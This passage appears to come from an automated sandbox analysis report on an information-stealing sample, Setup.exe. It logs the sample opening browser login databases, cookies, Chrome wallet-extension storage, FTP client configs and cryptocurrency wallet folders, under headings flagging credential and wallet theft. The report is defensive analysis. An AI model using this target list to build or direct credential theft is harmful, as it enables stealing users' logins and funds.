              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
